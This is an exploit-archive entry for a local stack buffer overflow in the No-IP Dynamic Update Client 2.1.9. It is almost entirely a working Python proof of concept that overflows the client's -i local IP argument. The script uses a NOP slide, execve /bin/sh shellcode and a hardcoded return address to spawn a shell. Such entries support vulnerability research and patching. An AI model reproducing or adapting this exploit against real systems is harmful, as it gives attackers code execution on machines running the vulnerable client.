No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow

2013-05-13T00:00:00
ID 1337DAY-ID-20764
Type zdt
Reporter Alberto Ortega
Modified 2013-05-13T00:00:00

Description

To be easily portable, the client is written in C, with minimal dependencies. So far so good, but the problem is, it is plagued of buffer overflows.

                                        
                                            import os
 
binary = "./noip-2.1.9-1/binaries/noip2-i686"
 
shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"\
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"\
            "\x80\xe8\xdc\xff\xff\xff/bin/sh"
 
nop = "\x90"
nop_slide = 296 - len(shellcode)
 
# (gdb) print &IPaddress
# $2 = (<data variable, no debug info> *) 0x80573bc
eip_addr = "\xbc\x73\x05\x08"
 
print "[*] Executing %s ..." % (binary)
 
os.system("%s -i %s%s%s" % (binary, nop*nop_slide, shellcode, eip_addr))

#  0day.today [2018-04-04]  #